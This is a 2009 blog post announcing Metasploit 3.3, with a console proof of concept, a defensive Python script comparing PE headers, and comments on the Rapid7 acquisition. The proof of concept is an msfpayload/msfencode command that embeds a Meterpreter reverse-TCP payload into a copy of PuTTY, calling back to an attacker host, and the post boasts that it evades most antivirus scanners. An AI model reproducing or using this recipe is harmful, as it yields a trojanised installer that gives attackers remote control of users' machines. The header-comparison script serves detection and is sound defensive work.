Posted by kecoak on Nov 18, 2009

.metasploit framework 3.3 released.

.it has been 363 days since the Metasploit 3.2 release notes came out; hard work from the dev team and contributions from freelancers have made this Ruby-based framework API grow quite fast, the spirit of the open source project-

.some of the changes in this release:
— 123 new exploits, 117 auxiliary modules.
— support for Ruby 1.9.1.
— better performance and stability, with a faster framework startup.
— integration with OSVDB: exploits that have a matching OSVDB entry carry its reference id.
— compatibility with 32-bit and 64-bit OSes, whether Unix, Mac OS or Windows.
— support for JSP payloads, IPv6, NX and DEP.
— Meterpreter supports screenshots, keylogging and packet sniffing.
— msfencode can embed a payload into arbitrary executables, both 32-bit and 64-bit.
.for more info see Metasploit's 3.3 release notes.

.remember this article, where Meterpreter was XOR-encoded with shikata_ga_nai and got past VirusTotal.
.here is a PoC of msfencode embedding a payload into an arbitrary executable.

[email protected]:/pentest/exploits/framework3$ ./msfconsole

 /         /              /
(___      (___  ___  ___ (     ___  ___
|   )   )|    |___)|___ |___)|   )|___)|   )
|__/  _/ |__  |__   __/ |   |    |__  |//
       /

       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 448 exploits - 216 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7564 updated today (2009.11.18)

msf > version
Framework: 3.4-dev.7554
Console  : 3.4-dev.7537

------------------------------------------------------------------

[email protected]:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe
[*] x86/shikata_ga_nai succeeded with size 102 (iteration=1)

.VirusTotal scan result: 2/41.

.here is a comparison of the metadata of the two PuTTY executables,

[email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe
---- ExifTool ----
ExifTool Version Number         : 7.89
---- System ----
File Name                       : putty.exe
Directory                       : /home/d0tz
File Size                       : 444 kB
File Modification Date/Time     : 2009:11:08 22:36:28+07:00
---- File ----
File Type                       : Win32 EXE
MIME Type                       : application/octet-stream
---- EXE ----
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2007:04:29 18:43:12+07:00
PE Type                         : PE32
Linker Version                  : 7.10
Code Size                       : 323584
Initialized Data Size           : 155648
Uninitialized Data Size         : 0
Entry Point                     : 0x4777f
OS Version                      : 4.0
Image Version                   : 0.0
Subsystem Version               : 4.0
Subsystem                       : Windows GUI
File Version Number             : 0.60.0.0
Product Version Number          : 0.60.0.0
File Flags Mask                 : 0x000b
File Flags                      : (none)
File OS                         : Win32
Object File Type                : Executable application
File Subtype                    : 0
Language Code                   : English (British)
Character Set                   : Unicode
Company Name                    : Simon Tatham
Product Name                    : PuTTY suite
File Description                : SSH, Telnet and Rlogin client
Internal Name                   : PuTTY
Original Filename               : PuTTY
File Version                    : Release 0.60
Product Version                 : Release 0.60
Legal Copyright                 : Copyright © 1997-2007 Simon Tatham.

------------------------------------------------------------------

[email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/puttyw00t.exe
---- ExifTool ----
ExifTool Version Number         : 7.89
---- System ----
File Name                       : puttyw00t.exe
Directory                       : /home/d0tz
File Size                       : 444 kB
File Modification Date/Time     : 2009:11:18 10:46:17+07:00
---- File ----
File Type                       : Win32 EXE
MIME Type                       : application/octet-stream
---- EXE ----
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2007:04:29 18:43:12+07:00
PE Type                         : PE32
Linker Version                  : 7.10
Code Size                       : 323584
Initialized Data Size           : 155648
Uninitialized Data Size         : 0
Entry Point                     : 0x4c511
OS Version                      : 4.0
Image Version                   : 0.0
Subsystem Version               : 4.0
Subsystem                       : Windows GUI
File Version Number             : 0.60.0.0
Product Version Number          : 0.60.0.0
File Flags Mask                 : 0x000b
File Flags                      : (none)
File OS                         : Win32
Object File Type                : Executable application
File Subtype                    : 0
Language Code                   : English (British)
Character Set                   : Unicode
Company Name                    : Simon Tatham
Product Name                    : PuTTY suite
File Description                : SSH, Telnet and Rlogin client
Internal Name                   : PuTTY
Original Filename               : PuTTY
File Version                    : Release 0.60
Product Version                 : Release 0.60
Legal Copyright                 : Copyright © 1997-2007 Simon Tatham.

.as you can see, the only difference is the entry point; is this so epic, guys??
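Exiftool only prints a few header fields, so a defender comparing a known-good binary against a suspect copy wants to look at the PE header directly: the entry point RVA, the section count, and whether the entry point now lands in a section that is both writable and executable. The script below is an added example, not code from the post or from Metasploit; it parses the PE header with only the standard library and runs on two constructed header-only samples (the original modelled on the exiftool numbers above, the suspect with an extra section and a moved entry point, both invented for the demo), but works the same on real files read from disk.

```python
import struct

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000

def parse_pe(data: bytes) -> dict:
    """Read the entry point RVA and section table from a PE32 header (no imports)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew -> "PE\0\0"
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]    # COFF SizeOfOptionalHeader
    opt = pe + 24                                            # optional header start
    entry = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint (RVA)
    sections = []
    for i in range(nsect):                                   # 40-byte section headers
        off = opt + opt_size + i * 40
        name, vsize, va = struct.unpack_from("<8sII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]  # Characteristics
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, chars))
    return {"entry": entry, "sections": sections}

def section_of(pe: dict, rva: int):
    """Section tuple containing an RVA, or None if it lies outside every section."""
    for s in pe["sections"]:
        if s[1] <= rva < s[1] + max(s[2], 1):
            return s
    return None

def compare_pe(original: bytes, suspect: bytes) -> list:
    """Header-level differences that a re-packaged template commonly leaves behind."""
    a, b = parse_pe(original), parse_pe(suspect)
    findings = []
    if a["entry"] != b["entry"]:
        findings.append("entry point moved 0x%x -> 0x%x" % (a["entry"], b["entry"]))
    if len(b["sections"]) != len(a["sections"]):
        findings.append("section count %d -> %d" % (len(a["sections"]), len(b["sections"])))
    sec = section_of(b, b["entry"])
    if sec is None:
        findings.append("entry point outside every section")
    elif sec[3] & IMAGE_SCN_MEM_WRITE and sec[3] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry point in writable+executable section %r" % sec[0])
    return findings

def build_pe(entry: int, sections) -> bytes:
    """Constructed PE32 header (headers only, not a loadable binary) for the demo."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                   # e_lfanew = 64
    opt = struct.pack("<HBBIIII", 0x10B, 7, 10, 0, 0, 0, entry).ljust(224, b"\0")
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, vs, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, ch in sections)
    return dos + coff + opt + table

# Constructed samples: entry 0x4777f and code size 0x4f000 follow the exiftool output above.
ORIGINAL = build_pe(0x4777f, [(".text", 0x1000, 0x4F000, 0x60000020), (".data", 0x50000, 0x26000, 0xC0000040)])
SUSPECT = build_pe(0x77000, [(".text", 0x1000, 0x4F000, 0x60000020), (".data", 0x50000, 0x26000, 0xC0000040),
                             (".text", 0x77000, 0x1000, 0xE0000020)])

if __name__ == "__main__":
    for f in compare_pe(ORIGINAL, SUSPECT):
        print("[!]", f)
```

On real files, replace the constructed samples with `open(path, "rb").read()` for the vendor binary and the copy under investigation; a clean pair returns an empty list.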

.although the latest news, Rapid7's announcement and HD Moore's mail, says Metasploit has been acquired by Rapid7, there are several perspectives on Rapid7 getting involved in this project: on the positive side, the dev team will be more professional, so Metasploit will be more stable and exploit releases will be much faster. On the negative side, maybe some of the more advanced features will be charged for by Rapid7, like Nessus maybe, damn!… [that's just my opinion]

.we'll just see what the dev team and HD Moore do: whether they keep the 3-clause BSD license or follow in the footsteps of Immunity CANVAS and Core Impact, which are commercial.

.last w0rd, welcome Metasploit 3.4-dev-
